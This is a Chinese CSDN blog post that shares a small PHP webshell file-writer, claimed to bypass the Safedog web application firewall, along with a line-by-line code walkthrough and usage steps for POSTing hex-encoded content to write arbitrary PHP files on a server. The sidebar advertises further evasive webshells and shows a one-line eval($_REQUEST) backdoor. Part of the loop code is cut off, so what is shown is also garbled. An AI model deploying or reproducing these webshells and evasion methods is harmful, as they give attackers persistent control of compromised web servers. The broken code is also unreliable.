绕安全狗php大马和小马,分享PHP小马一枚,完美绕过安全狗检测。

于 2021-03-22 04:30:36 发布
阅读量470 收藏
点赞数
文章标签: 绕安全狗php大马和小马

PHP 后门 代码分析 安全防护 文件操作
关键词由CSDN通过智能技术生成

没做免杀之前,被狗咬死:

L3Byb3h5L2h0dHAvaW1nMS5waC4xMjYubmV0LzNfdEJHZU9DWTBSandXRWNYVGh5YVE9PS82NjMwNzgwNzkzMTY2NjI4MDAxLmpwZw==.jpg

直接上代码:

$p=realpath(dirname(__FILE__)."/../").$_POST["a"];

$t=$_POST["b"];

$tt="";

for ($i=0;$i @fwrite(fopen($p,"w"),$tt);

echo "success!";

?>

代码分析:

$p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_POST["a"]的内容

$t=$_POST["b"]; //定义$t为$_POST["b"]的内容

$tt=""; //定义$tt为空

for ($i=0;$i

@fwrite(fopen($p,"w"),$tt); //写入文件地址是$p,内容是$tt

echo "success!";

?>

利用方法:

将写入的内容用url编码,比如,编码后为:%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E。去掉其中的%,得到:3C3F70687020706870696E666F28293B3F3E。

然后访问后门,将POST内容改为:a=/111.php&b=3C3F70687020706870696E666F28293B3F3E,即可写入内容。

成功过狗:

L3Byb3h5L2h0dHAvaW1nMS5waC4xMjYubmV0LzBja29wQUhaaThIMGVvamt2S1VRUFE9PS82NjMwMDYxNzEyNTYxMzA3ODM1LmpwZw==.jpg

在满天星光下
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WAF绕过--小马绕过
wwxxee
05-17 861
WAF绕过小马免杀 WAF:安全狗-Apache版 v4 正常的PHP一句话木马: <?php eval($_REQUEST[6]);?> 对于这个正常的一句话木马,安全狗会拦截。 关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配] 我们尝试只写<?php eval();?> 发现没有拦截,但是加了REQUEST[6]就拦截了那么我们是不是可以尝试测试看看究竟拦截_REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截R​EQUES
如何绕过检测上传php文件,shell上传绕过检测方法
weixin_36026440的博客
03-11 714
文件上传漏洞是所有漏洞中最为直接,有效的获取服务器权限的方法。但是想要利用好他并不容易,因为他的上传姿势实在是太过花哨(多)。所以这里介绍一些简单的上传姿势。望大牛误喷shell上传条件:1、上传点2、绝对路径3、要有权限文件上传检验姿势1、客户端javascript校验(一般只校验后缀名)2、服务端校验①文件头content-type字段校验(image/gif)②文件内容头校验(GIF89a)...
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗检测,进而链接服务器。相关链接为https://download.csdn.net/download/wychy2008/10318498
过狗PHP大马
03-03
过狗PHP大马,可以过掉目前安全狗、360等安全软件,亲测可用,并且无视各种杀软
php大马安全狗D盾和云锁
04-10
php大马安全狗D盾和云锁
分享PHP小马一枚完美绕过安全狗检测
weixin_30565327的博客
01-23 342
没做免杀之前,被狗咬死: 直接上代码: $p=realpath(dirname(__FILE__)."/../").$_POST["a"];$t=$_POST["b"];$tt="";for ($i=0;$i@fwrite(fopen($p,"w"),$tt);echo "success!";?> 代码分析: $p=realpath(dirname(__FILE...
2017php免杀大马 过狗
02-19
才卖一个资源分了,密码123123
2019最新过狗过,云锁,360等WAF的PHP免杀大马
03-20
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件,2019最新大马下载PHP
大马小马(数学活动) (2).doc
10-20
大马小马(数学活动)】是一个针对中小学阶段设计的数学教学活动,旨在通过互动和游戏的方式,帮助学生掌握基本的数学概念,特别是数量的比较和排序。以下是活动中的关键知识点及其详细解释: 1. **一一对应...
PHP过D盾免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
最新PHP免杀过狗免杀WAF2k大马shell
02-02
最新PHP免杀过狗免杀WAF2k大马shell/仅用于技术研究请勿非法使用
php大马(webshell)
05-26
增加了到达部分敏感目录的快捷链接。除了登录密码部分,其它所有代码已经过base64_decode加密(免杀性能好),请自行修改$admin['pass']处的登录密码。由于此php大马的功能过于强大,请勿用于非法用途。
php-webshell大马(功能齐全)
10-28
php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。
最新过狗过盾云锁百度云大马_大马_php过狗马_最新过狗过盾云锁百度云大马_
10-03
最新过狗过盾云锁百度云大马 簡單實用 建議下載
PHP小马免杀的浅谈[过最新D盾]1
08-03
这篇文章主要探讨的是如何在PHP环境中创建“小马”(webshell)并使其免于被安全软件如D盾检测PHP小马通常是指一种恶意代码,允许攻击者远程控制被入侵的服务器,执行任意PHP命令。文章中提到了两种绕过D盾检测的...
php超小免杀大马_最新过狗免杀php大马体积最小1KB吗
weixin_39796149的博客
12-20 247
代码如果下:编码请自行换UTF-8无BOM格式编码
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2962
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
php超小免杀大马_php最新php大马免杀过狗最小1kB吗?
weixin_39688856的博客
12-20 217
谁知道这个php大马是什么加密的?听说可以过狗免杀过盾是真的吗?
web大马小马的区别
最新发布
07-09
Web大马小马是网络安全领域中的术语,用来描述恶意软件(Malware)的不同类型和功能。 Web大马(Web Shell)是一种恶意软件,通常以脚本文件的形式存在于受攻击的Web服务器上。它可以通过远程访问的方式,让黑客在受感染的服务器上执行命令和控制服务器。Web大马通常隐藏在合法的文件中,例如网页或脚本文件,以避免被发现。黑客可以使用Web大马来获取敏感信息、修改网站内容、进行远程攻击等活动。 小马(Trojan Horse)是一种常见的恶意软件,以木马的形象来比喻。它通常伪装成合法的程序或文件,诱使用户下载并执行。一旦感染,小马会在用户计算机上执行恶意活动,例如窃取个人信息、远程控制计算机、传播其他恶意软件等。小马的特点是隐藏性强,用户往往难以察觉其存在。 总结来说,Web大马主要针对Web服务器,通过远程访问实现对服务器的控制;而小马则主要针对用户计算机,通过伪装成合法程序进行传播和操控。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值